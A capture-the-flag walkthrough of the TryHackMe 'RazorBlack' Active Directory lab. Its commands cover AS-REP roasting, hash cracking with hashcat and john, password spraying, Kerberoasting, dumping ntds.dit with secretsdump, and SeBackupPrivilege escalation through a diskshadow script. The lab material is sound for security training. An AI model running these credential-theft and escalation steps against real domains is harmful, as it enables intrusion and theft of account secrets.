RazorBlack: Active Directory Room From TryHackMe By Hashar Mujahid
These guys call themselves hackers. Can you show them who’s the boss ??
Initial Enumeration:
We can start off with a nmap port scan to what services our target is running.
sudo nmap -sC -sV -p- --min-rate 1500 <Target-IP>
Our target DNS is “raz0rblack.thm”. Let's add it to our hosts file.
and continue enumeration.
We have Smb open let's try to enumerate some shares.
SMB ENUMERATION:
I tried many tools but looks like we cannot enumerate the shares.
User Enumeration With Kerbrute:
We can maybe enumerate the valid users using kerbrute but .
We couldn't find any other users.
RPC ENUMERATION:
We have RPC on port 111 let's try to enumerate that. There is great instruction on hakticks on how to enumerate the RPC.
During reading the instruction I found something interesting.
If I correctly recall we do have an NFS running on port 2049.
We can run showmount -e <ip-address> to list any shared directories
We can see there is an /users directories. we can mount to this directory and get the contents in that directory.
You can retrieve the flag inside the sbradley.txt. And also take a look inside the employee_status.xlsx.
We have a list of usernames but we first have to change them into the naming convention used by AD. As we have seen in the directory file named sbradley.txt we need to change every username into the first character of the first name and followed by the last name.
ASREPROASTING:
Now we have a list of hopefully valid usernames we can apply the ASEProasting Technique to get the NTML hash of the user who has pre-authentication disabled.
If you want to learn what is ASEProasting you can see this video from CONDA.
The tool which can help us to perform this technique is GetNPUsers.py which is a part of impacket.
Syntax:
GetNPUsers.py -no-pass -usersfile validusers.txt Domainame/
We got the hash of user twilliams because he does not have “Pre-Authentication” Enabled.
Now We just need to crack the hash using the hashcat.
hashcat -m 18200 hash <wordlist path>
Now we have a username twilliams and his password. We can try to enumerate the shares for the twilliams.
Twilliams-Shares:
We can use smbclient or smbmap to retrieve the shares.
All other shares are not useful except trash. Let's connect to it.
Password Spraying:
What we can do is to use crackmapexec and use a technique called password spraying to see if any other user is using the same password.
crackmapexec smb <ip> -u <usernames> -p <passwords>
We see the user sbradley has a msg to must change his password so it means we have the same password. We can set his new password and use that to login.
We can use smbpasswd tool to set up a new password for him.
smbpasswd -r <ip> -U <user>
Now let's connect to the shares. With user sbradley and a password set by you. I set it smbpassword101.
You may find it difficult to download the zip file.
You can use smbget to download it
We also have a chat log.
┌──(kali㉿kali)-[~/Desktop/CTFs/Razorblack.thm]
└─$ cat chat_log_20210222143423.txt
sbradley> Hey Administrator our machine has the newly disclosed vulnerability for Windows Server 2019.
Administrator> What vulnerability??
sbradley> That new CVE-2020-1472 which is called ZeroLogon has released a new PoC.
Administrator> I have given you the last warning. If you exploit this on this Domain Controller as you did previously on our old Ubuntu server with dirtycow, I swear I will kill your WinRM-Access.
sbradley> Hey you won't believe what I am seeing.
Administrator> Now, don't say that you ran the exploit.
sbradley> Yeah, The exploit works great it needs nothing like credentials. Just give it IP and domain name and it resets the Administrator pass to an empty hash.
sbradley> I also used some tools to extract ntds. dit and SYSTEM.hive and transferred it into my box. I love running secretsdump.py on those files and dumped the hash.
Administrator> I am feeling like a new cron has been issued in my body named heart attack which will be executed within the next minute.
Administrator> But, Before I die I will kill your WinRM access..........
sbradley> I have made an encrypted zip containing the ntds.dit and the SYSTEM.hive and uploaded the zip inside the trash share.
sbradley> Hey Administrator are you there ...
sbradley> Administrator .....The administrator died after this incident.Press F to pay respects
It means we have ntds.dit in our zip let's unzip it.
Our zip file is password protected we can use zip2john to get the password hash and then use john to crack it.
zip2john:
zip2john experiment_gone_wrong.zip > ziphash.txt
John:
john --wordlist=rockyou.txt ziphash.txt
Now let's unzip it.
Now we have the ntds.dit and system.hieve.
We can use secretsdumps.py to unshadow these files.
Secretsdump.py:
This will create a ntds.unshadowed file in the working directory.
Now, all we need is to answer the questions.
We need to do some formatting if we want to use the hashes to find answers
We see the hash we need is after the fourth delimiter ‘:’.
We can use awk to get only the ntml hashes and save them in a separate file.
Ljudmila’s Hash:
We can brute force the smb with crackmapexec and get the valid hash of lvetrova.
We have the hash now we can log in using evil-winrm.
Our flag is encoded in Pscredentials we can decode it using.
The above method failed. We can try this method as well.
To encode:$password = convertto-securestring "TestPassword" -asplaintext -force
$credentials = New-Object System.Net.NetworkCredential("TestUsername", $password, "TestDomain")
TO DECODE:
$Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($credentials.password)
$result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr)
[System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr)
$result
In the Users directory, I found a new username xyan1d3. Add it to our username list.
We can do kerbroasting to look for service tickets.
Kerberoasting:
Kerberoasting is a post-exploitation attack technique that attempts to compromise the password of an Active Directory service account (AD). An attacker disguised as an account user with a service principal name (SPN) requests a ticket with an encrypted password, or Kerberos, in such an attack.
Impacket GetUserSPN.py:
We can use impcket’s GetUserSPN.py to kerbroast the user lvetrova.
Syntax:
GetUserSPNs.py <domain_name>/<domain_user> -hashes LNTML:NTML -request -outputfile <output_TGSs_file>
We can see the service ticket for Xyan1d3. we can request it from the domain.
Now all we need is to crack this hash with hashcat.
hashcat -m 13100 hash rockyou.txt 
Now let's log in as Xyan1d3.
We have to repeat the whole Pscredential decode process again.
Now comes the toughest part of the puzzle. GETTING ROOT!
We can try to run SharpHound.ps1
FAILED.
After trying a lot of things I came across something interesting.
In PEH by TCM security Heath-Adams Does Mention this privilege being vulnerable. Let's see.
This is a great article if you want to see a video there is a great video by conda.
Now we need to create the a script to get start the backup process.
A guide to how to create the script.
set context persistent nowriters
set metadata c:\windows\system32\spool\drivers\color\example.cab
set verbose on
begin backup
add volume c: alias mydrive
create
expose %mydrive% w:
end backupYou may need to add another letter at the end of every line in script.
Because of some wired reason, the last letter of every line is skipped.
Now it works fine.
After that upload it to target.
Now we just need to execute it using diskshadow utility.
diskshadow /s backup.txt
2nd, we need to download the DLL files from the repository given below
The first “SeBackupPrivilegeCmdLets.dll” checks to see if the SeBackupPrivilege is enabled, and the second “SeBackupPrivilegeUtils.dll” copies files.
Remember that before utilizing the copying feature, you must first generate a shadow copy of the files you wish to retrieve. Because the files are in use, you cannot copy them directly. The “Copy-FileSeBackupPrivilege” copying function is an alternative to utilizing Robocopy Utility.
Now upload both Dll to the target using evil-winrm’s upload command.
Now we need to import these dlls using the import module command.
Now we can validate our privileges. After that, we need to use the Copy-FileSeBackupPrivilege to copy the backup into our directory.
Get-SeBackupPrivilege
Set-SeBackupPrivilege
Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\users\xyan1d3\ntds.dit -OverwriteThe last 2 commands copy the the ntds.dit and the system hieve files.
Now download these files onto your Host machine.
Now we can again use Secretsdump.py to get the hashes.
We can now log in as Admin.
Now just Get the flags in Home directory.
It is not pscredential it is just plain Hex.
Just go to cyber chef or any hex decoder tool and decode it.
We also need a tyson Flag.
It was in twilliams directory.
Finally, we hacked this one.
Hope You like it .
From Infosec Writeups: A lot is coming up in the Infosec every day that it’s hard to keep up with. Join our weekly newsletter to get all the latest Infosec trends in the form of 5 articles, 4 Threads, 3 videos, 2 Github Repos and tools, and 1 job alert for FREE!
